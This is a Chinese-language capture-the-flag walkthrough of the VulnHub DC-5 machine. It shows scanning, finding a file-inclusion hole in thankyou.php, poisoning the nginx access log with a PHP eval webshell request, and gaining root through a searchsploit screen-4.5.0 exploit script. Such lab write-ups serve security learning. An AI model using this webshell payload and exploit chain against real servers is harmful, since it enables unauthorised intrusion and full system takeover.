首页 > 其他分享 >DC-5 靶场通关小记

DC-5 靶场通关小记

时间:2025-01-08 11:23:46浏览次数:6  
标签:bin http usr DC 192.168 74.130 靶场 php 小记

地址 https://www.vulnhub.com/entry/dc-5,314/

环境配置

有兼容性问题参考 https://www.cnblogs.com/lrui1/p/18655388

信息收集

./rustscan -a 192.168.74.130 -- -A -sC
Open 192.168.74.130:111
Open 192.168.74.130:80
Open 192.168.74.130:53199

PORT      STATE SERVICE REASON         VERSION
80/tcp    open  http    syn-ack ttl 64 nginx 1.6.2
|_http-title: Welcome
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-server-header: nginx/1.6.2
111/tcp   open  rpcbind syn-ack ttl 64 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          33558/udp6  status
|   100024  1          35272/udp   status
|   100024  1          53199/tcp   status
|_  100024  1          58024/tcp6  status
53199/tcp open  status  syn-ack ttl 64 1 (RPC #100024)

python dirsearch.py -u http://192.168.74.130/
[17:08:05] Starting:
[17:08:37] 200 -    4KB - /contact.php
[17:08:38] 301 -  184B  - /css  ->  http://192.168.74.130/css/
[17:08:52] 200 -    6KB - /faq.php
[17:08:53] 200 -   17B  - /footer.php
[17:08:58] 301 -  184B  - /images  ->  http://192.168.74.130/images/
[17:08:58] 403 -  570B  - /images/
[17:09:31] 200 -  852B  - /thankyou.php

漏洞发现

访问Web服务http://192.168.74.130/,在点击/footer.php后发现copy right的数字是有变化的,footer.php是一个动态的页面,在contact.php提交内容后会跳转到thankyou.php,包含了footer.php,存在文件包含,使用Yakit进行fuzz测试,file=index.php可以实现包含本地文件的效果

为什么爆破查询参数可以呢?等到时候看看源码分析一下

GET /thankyou.php?{{payload(parameter)}}=index.php HTTP/1.1
Host: 192.168.74.130
Referer: http://192.168.74.130/contact.php
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1

字典链接 https://github.com/TheKingOfDuck/fuzzDicts/blob/master/paramDict/parameter.txt

image.png

验证存在任意文件读取漏洞

image.png

读取nginx服务器日志,/var/log/nginx/access.loh,对服务端的每次请求都有记录在日志文件中,发送一句话木马请求,利用文件包含漏洞包括该日志连接

发送一句话木马(不要URL编码)

GET /<?php @eval($_REQUEST['shell'])?> HTTP/1.1
Host: 192.168.74.130
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

Webshell路径为http://192.168.74.130/thankyou.php?file=../../../../var/log/nginx/access.log,蚁剑连接

image.png

分析一下thankyou.php,foot部分如下

<div class="footer-wrapper">
	<footer>
		<?php

			$file = $_GET['file'];
				if(isset($file))
				{
					include("$file");
				}
				else
				{
					include("footer.php");
				}

		?>
	</footer>
</div>

这一块代码改成include("footer.php");就没有漏洞了

提权

查找有suid的文件

find / -perm -u=s -type f 2>/dev/null
/bin/su
/bin/mount
/bin/umount
/bin/screen-4.5.0
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/at
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/sbin/exim4
/sbin/mount.nfs

/bin/screen-4.5.0值得关注,使用本地漏洞库搜索

searchsploit screen                 
searchsploit -m linux/local/41154.sh

有一个本地提权的POC,拷贝出,通过Webshell上传至tmp目录,给予执行权限后执行,获得root权限

image.png

标签:bin,http,usr,DC,192.168,74.130,靶场,php,小记
From: https://www.cnblogs.com/lrui1/p/18659339

相关文章

  • flinkcdc 实现数据监听
    1.概述FlinkCDC是一个用于实时数据和批处理数据的分布式数据集成工具。他可以监听数据库表的变化。实现将数据变化写到其他的数据源中。我们可以使用java实现自定义的数据写出。下面是实现细节。2.实现代码2.1项目依赖<dependencies><dependency><......
  • 线性规划对偶小记
    有\(n\)个变量\(x_1,x_2,\dots,x_n\),有若干条限制,形如:\(f(x_1,x_2,\dots,x_n)\leb\)\(f(x_1,x_2,\dots,x_n)=b\)\(f(x_1,x_2,\dots,x_n)\geb\)三种不同形式(注意不能取小于或大于号),可称这些限制是线性的。同时,需要最大化\(\sum\limits_{i=1}^......
  • 【vulnhub靶场】日志投毒与文件包含漏洞 Solstice
    一、侦查1.1收集目标网络信息:IP地址1.2主动扫描:扫描IP地址段二、初始访问2.1利用面向公众的应用三、权限提升3.1利用漏洞提权:高权限运行的程序一、侦查1.1收集目标网络信息:IP地址靶机启动后,没有提供IP地址。由于Kali和靶机在同一个C段,可以扫描ARP......
  • stm32cubeide usb cdc hid
    STM32CubeMX系列教程25:USBDevice-STM32CubeMX系列教程微雪课堂本章不打算详细讲解USB的协议,本章只是介绍如何通过STM32CubeMX软件生成应用程序。在看本教程之前建议先看ST官方关于USB的培训视频,示例 http://www.stmcu.com.cn/videos.html 一、USB简介    ......
  • (即插即用模块-Attention部分) 三十六、(2023) DCA 二重交叉注意力
    文章目录1、DualCross-Attention2、代码实现paper:DualCross-AttentionforMedicalImageSegmentationCode:https://github.com/gorkemcanates/Dual-Cross-Attention1、DualCross-AttentionU-Net及其变体尽管在医学图像分割任务中取得了良好的性能,但仍然存......
  • #define int long long 必须写在#include<bits/stdc++.h>的下方
    #include<bits/stdc++.h>usingnamespacestd;intd2[8][2]={{-1,-2},{1,-2},{-2,-1},{2,-1},{-2,1},{2,1},{-1,2},{1,2}};intx,y,k,l;intvis[25][25];inta[25][25];boolcheck(intm,intn){ if(m<0||n<0||m>x+1||n>y+1) returnfalse; ret......
  • Vulnhub靶场(potato-suncsr)
    项目地址https://www.vulnhub.com/entry/potato-suncsr-1,556/搭建靶机官网下载.ova文件双击vm打开导入获取靶机IPkail终端输入arp-scan-l获取靶机IP192.168.131.185信息收集nmap-A-p-192.168.131.185dirbhttp://192.168.131.185/一个土豆子一个phpi......
  • builder.Services.AddCors()
    在ASP.NETCore中,使用builder.Services.AddCors()方法可以配置跨源资源共享(CORS)策略。CORS是一种安全机制,用于允许一个域上的网页请求另一个域上的资源。默认情况下,浏览器会阻止跨源请求,因此需要通过配置CORS来允许这些请求。配置CORS的基本步骤以下是如何在ASP.NETC......
  • DC-3 靶场通关小记
    地址https://www.vulnhub.com/entry/dc-32,312/1.0环境配置1.1导入Vmware编辑虚拟机报错虚拟机->管理->更改硬件兼容性1.2ide1:0改为ide0:01.3网卡改为NAT模式2.信息收集fscan.exe-h192.168.74.0/24-nobr-nopocfscan.exe-h192.168.74.131-p1-65535#......
  • builder.Services.AddControllersWithViews
    在ASP.NETCore中,builder.Services.AddControllersWithViews是一个用于配置应用程序以支持MVC(Model-View-Controller)模式的扩展方法。它通常在应用程序的启动配置文件中使用,例如Program.cs或Startup.cs。这个方法的作用是注册MVC控制器和视图所需的依赖项和服务。在ASP......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99